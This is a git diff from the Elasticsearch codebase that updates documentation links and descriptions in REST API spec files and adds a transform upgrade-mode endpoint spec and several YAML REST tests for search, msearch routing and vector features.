+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-termvectors", + "description":"Get term vector information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_field_structure.json b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_field_structure.json index f82e2ca2d190f..2674dd5b4dffb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_field_structure.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_field_structure.json @@ -1,8 +1,8 @@ { "text_structure.find_field_structure":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/find-field-structure.html", - "description":"Finds the structure of a text field in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-text_structure", + "description":"Find the structure of a text field" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_message_structure.json b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_message_structure.json index d839e4b048f7d..852607cb4296f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_message_structure.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_message_structure.json @@ -1,8 +1,8 @@ { "text_structure.find_message_structure":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/find-message-structure.html", - "description":"Finds the structure of a list of messages. The messages must contain data that is suitable to be ingested into Elasticsearch." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-find-message-structure", + "description":"Find the structure of text messages" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_structure.json b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_structure.json index c244db7aa8351..64370a67e617c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_structure.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_structure.json @@ -1,8 +1,8 @@ { "text_structure.find_structure":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/find-structure.html", - "description":"Finds the structure of a text file. The text file must contain data that is suitable to be ingested into Elasticsearch." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-find-structure", + "description":"Find the structure of a text file" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.test_grok_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.test_grok_pattern.json index b291ce6b87e8e..c8ee70313d31c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.test_grok_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.test_grok_pattern.json @@ -1,8 +1,8 @@ { "text_structure.test_grok_pattern": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/test-grok-pattern.html", - "description": "Tests a Grok pattern on some text." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-test-grok-pattern", + "description": "Test a Grok pattern" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.delete_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.delete_transform.json index 1af53ec0e8c3a..b9f1b7419568a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.delete_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.delete_transform.json @@ -1,8 +1,8 @@ { "transform.delete_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-transform.html", - "description":"Deletes an existing transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-delete-transform", + "description":"Delete a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_node_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_node_stats.json index ca3fde65f6363..a4c1fdc5b0ca2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_node_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_node_stats.json @@ -2,7 +2,7 @@ "transform.get_node_stats":{ "documentation":{ "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-transform-node-stats.html", - "description":"Retrieves transform usage information for transform nodes." + "description":"Retrieves transform usage information for transform nodes" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform.json index 334537d49a716..f47c5eedd0ba5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform.json @@ -1,8 +1,8 @@ { "transform.get_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-transform.html", - "description":"Retrieves configuration information for transforms." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-get-transform", + "description":"Get transforms" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform_stats.json index 8139fac7a818e..3805804becb13 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform_stats.json @@ -1,8 +1,8 @@ { "transform.get_transform_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-transform-stats.html", - "description":"Retrieves usage information for transforms." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-get-transform-stats", + "description":"Get transform stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.preview_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.preview_transform.json index 5740f5d9ab2e0..f55b8631aacf9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.preview_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.preview_transform.json @@ -1,8 +1,8 @@ { "transform.preview_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/preview-transform.html", - "description":"Previews a transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-preview-transform", + "description":"Preview a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.put_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.put_transform.json index 5f4b986d831ef..9e10a8b9189a1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.put_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.put_transform.json @@ -1,8 +1,8 @@ { "transform.put_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-transform.html", - "description":"Instantiates a transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-put-transform", + "description":"Create a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.reset_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.reset_transform.json index d86b9290e8dac..f9fedf2e63cbd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.reset_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.reset_transform.json @@ -1,8 +1,8 @@ { "transform.reset_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/reset-transform.html", - "description":"Resets an existing transform." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-reset-transform", + "description":"Reset a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.schedule_now_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.schedule_now_transform.json index 81ba9e071cfd1..849670fd6b63b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.schedule_now_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.schedule_now_transform.json @@ -1,8 +1,8 @@ { "transform.schedule_now_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/schedule-now-transform.html", - "description":"Schedules now a transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-schedule-now-transform", + "description":"Schedule a transform to start now" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.set_upgrade_mode.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.set_upgrade_mode.json new file mode 100644 index 0000000000000..32e2afdebad13 --- /dev/null +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.set_upgrade_mode.json @@ -0,0 +1,33 @@ +{ + "transform.set_upgrade_mode":{ + "documentation":{ + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-set-upgrade-mode", + "description":"Set upgrade_mode for transform indices" + }, + "stability":"stable", + "visibility":"public", + "headers":{ + "accept": [ "application/json"] + }, + "url":{ + "paths":[ + { + "path":"/_transform/set_upgrade_mode", + "methods":[ + "POST" + ] + } + ] + }, + "params":{ + "enabled":{ + "type":"boolean", + "description":"Whether to enable upgrade_mode Transform setting or not. Defaults to false." + }, + "timeout":{ + "type":"time", + "description":"Controls the time to wait before action times out. Defaults to 30 seconds" + } + } + } +} diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.start_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.start_transform.json index b7fb849987afb..624ffa430bd20 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.start_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.start_transform.json @@ -1,8 +1,8 @@ { "transform.start_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/start-transform.html", - "description":"Starts one or more transforms." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-start-transform", + "description":"Start a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.stop_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.stop_transform.json index 1beb8066c1803..6de4567b6ae4d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.stop_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.stop_transform.json @@ -1,8 +1,8 @@ { "transform.stop_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/stop-transform.html", - "description":"Stops one or more transforms." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-stop-transform", + "description":"Stop transforms" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.update_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.update_transform.json index 61734de8bef78..12ced0c2b551c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.update_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.update_transform.json @@ -1,8 +1,8 @@ { "transform.update_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/update-transform.html", - "description":"Updates certain properties of a transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-update-transform", + "description":"Update a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.upgrade_transforms.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.upgrade_transforms.json index 0ad1412d06e9e..8484ff2b811f3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.upgrade_transforms.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.upgrade_transforms.json @@ -1,8 +1,8 @@ { "transform.upgrade_transforms":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/upgrade-transforms.html", - "description":"Upgrades all transforms." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-upgrade-transforms", + "description":"Upgrade all transforms" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/update.json b/rest-api-spec/src/main/resources/rest-api-spec/api/update.json index 9e47e80547e88..6486e0a4f3c3e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/update.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/update.json @@ -1,8 +1,8 @@ { "update":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-update.html", - "description":"Updates a document with a script or partial document." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update", + "description":"Update a document" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query.json index 8cf44f289ce01..0af360fb24eaa 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query.json @@ -1,8 +1,8 @@ { "update_by_query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-update-by-query.html", - "description":"Performs an update on every document in the index without changing the source,\nfor example to pick up a mapping change." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query", + "description":"Update documents" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query_rethrottle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query_rethrottle.json index 18895ad443c6f..c76fcbaeb3353 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query_rethrottle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query_rethrottle.json @@ -1,8 +1,8 @@ { "update_by_query_rethrottle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-update-by-query.html", - "description":"Changes the number of requests per second for a particular Update By Query operation." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query-rethrottle", + "description":"Throttle an update by query operation" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.ack_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.ack_watch.json index 0c04888991fc5..7946eba4296a5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.ack_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.ack_watch.json @@ -1,8 +1,8 @@ { "watcher.ack_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-ack-watch.html", - "description":"Acknowledges a watch, manually throttling the execution of the watch's actions." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-ack-watch", + "description":"Acknowledge a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.activate_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.activate_watch.json index 698b08f3fdc8a..1b26599ec6aed 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.activate_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.activate_watch.json @@ -1,8 +1,8 @@ { "watcher.activate_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-activate-watch.html", - "description":"Activates a currently inactive watch." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-activate-watch", + "description":"Activate a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.deactivate_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.deactivate_watch.json index e9b7407eb5c9d..505500c61a438 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.deactivate_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.deactivate_watch.json @@ -1,8 +1,8 @@ { "watcher.deactivate_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-deactivate-watch.html", - "description":"Deactivates a currently active watch." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-deactivate-watch", + "description":"Deactivate a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.delete_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.delete_watch.json index 9417a8a57b56b..881fddcb1d7a1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.delete_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.delete_watch.json @@ -1,8 +1,8 @@ { "watcher.delete_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-delete-watch.html", - "description":"Removes a watch from Watcher." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-delete-watch", + "description":"Delete a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.execute_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.execute_watch.json index a011669ce373c..395f7512be0e4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.execute_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.execute_watch.json @@ -1,8 +1,8 @@ { "watcher.execute_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-execute-watch.html", - "description":"Forces the execution of a stored watch." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-execute-watch", + "description":"Run a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_settings.json index 3ae59c9d024a7..ef02edd190cb8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_settings.json @@ -1,8 +1,8 @@ { "watcher.get_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-get-settings.html", - "description":"Retrieve settings for the watcher system index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-get-settings", + "description":"Get Watcher index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_watch.json index 26899aefc53bb..c03842bebee1d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_watch.json @@ -1,8 +1,8 @@ { "watcher.get_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-get-watch.html", - "description":"Retrieves a watch by its ID." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-get-watch", + "description":"Get a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.put_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.put_watch.json index 462580198932c..090bf2f799dca 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.put_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.put_watch.json @@ -1,8 +1,8 @@ { "watcher.put_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-put-watch.html", - "description":"Creates a new watch, or updates an existing one." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-put-watch", + "description":"Create or update a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.query_watches.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.query_watches.json index b730f66af3617..4b2d49bc09bda 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.query_watches.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.query_watches.json @@ -1,8 +1,8 @@ { "watcher.query_watches":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-query-watches.html", - "description":"Retrieves stored watches." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-query-watches", + "description":"Query watches" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.start.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.start.json index ad0682c8d7b19..c77b5f46b75a6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.start.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.start.json @@ -1,8 +1,8 @@ { "watcher.start":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-start.html", - "description":"Starts Watcher if it is not already running." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-start", + "description":"Start the watch service" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stats.json index 35e90cbd1cddb..ad174ab44b1bf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stats.json @@ -1,8 +1,8 @@ { "watcher.stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-stats.html", - "description":"Retrieves the current Watcher metrics." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-stats", + "description":"Get Watcher statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stop.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stop.json index b1a67119df153..d142ba43eec70 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stop.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.stop.json @@ -1,8 +1,8 @@ { "watcher.stop":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-stop.html", - "description":"Stops Watcher if it is running." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-stop", + "description":"Stop the watch service" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.update_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.update_settings.json index 5a6a8d4a787ad..6c48a6e201fa0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.update_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.update_settings.json @@ -1,8 +1,8 @@ { "watcher.update_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-update-settings.html", - "description":"Update settings for the watcher system index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-update-settings", + "description":"Update Watcher index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.info.json index 35895f0ddb581..2412307de4f70 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.info.json @@ -1,8 +1,8 @@ { "xpack.info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/info-api.html", - "description":"Retrieves information about the installed X-Pack features." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-info", + "description":"Get information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.usage.json b/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.usage.json index e01f40348eadc..d48a6f3e6f607 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.usage.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/xpack.usage.json @@ -1,8 +1,8 @@ { "xpack.usage":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/usage-api.html", - "description":"Retrieves usage information about the installed X-Pack features." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-xpack", + "description":"Get usage information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/indices.recovery/10_basic.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/indices.recovery/10_basic.yml index 8ad06910ebe4d..0724f3831aeab 100644 --- a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/indices.recovery/10_basic.yml +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/indices.recovery/10_basic.yml @@ -17,6 +17,9 @@ indices.recovery: index: [test_1] human: true + ignore_unavailable: false + allow_no_indices: true + expand_wildcards: open - match: { test_1.shards.0.type: "EMPTY_STORE" } - match: { test_1.shards.0.stage: "DONE" } diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/mapping/20_synthetic_source.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/mapping/20_synthetic_source.yml new file mode 100644 index 0000000000000..abc83566d00b8 --- /dev/null +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/mapping/20_synthetic_source.yml @@ -0,0 +1,81 @@ +--- +synthetic_source text as multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: keyword + fields: + text: + type: text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source text with multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: text + fields: + raw: + type: keyword + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/10_basic.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/10_basic.yml index 1052508ca2b88..8ac4ee60f2bbc 100644 --- a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/10_basic.yml +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/10_basic.yml @@ -1,5 +1,7 @@ --- setup: + - requires: + test_runner_features: allowed_warnings - do: index: @@ -67,6 +69,12 @@ setup: rest_total_hits_as_int: true max_concurrent_shard_requests: 1 max_concurrent_searches: 1 + ignore_unavailable: false + ignore_throttled: false + allow_no_indices: false + expand_wildcards: open + include_named_queries_score: false + index: index_* body: - index: index_* - query: @@ -83,6 +91,8 @@ setup: - {} - query: match_all: {} + allowed_warnings: + - 
"[ignore_throttled] parameter is deprecated because frozen indices have been deprecated. Consider cold or frozen tiers in place of frozen indices." - match: { responses.0.hits.total: 2 } - match: { responses.1.hits.total: 1 } diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/40_routing.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/40_routing.yml new file mode 100644 index 0000000000000..5b69a4da98418 --- /dev/null +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/msearch/40_routing.yml @@ -0,0 +1,25 @@ +--- +setup: + - do: + index: + index: index_1 + routing: "1" + id: "1" + body: { foo: bar } + + - do: + indices.refresh: {} + +--- +"Routing": + + - do: + msearch: + rest_total_hits_as_int: true + routing: "1" + body: + - {} + - query: + match_all: {} + + - match: { responses.0.hits.total: 1 } diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/search.vectors/40_knn_search.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/search.vectors/40_knn_search.yml index 75be8d621608e..e617d08940f84 100644 --- a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/search.vectors/40_knn_search.yml +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/search.vectors/40_knn_search.yml @@ -605,6 +605,46 @@ setup: - match: { hits.hits.0._score: $knn_score0 } - match: { hits.hits.1._score: $knn_score1 } - match: { hits.hits.2._score: $knn_score2 } + +--- +"Dimensions are dynamically set": + - do: + indices.create: + index: test_index + body: + mappings: + properties: + embedding: + type: dense_vector + + - do: + 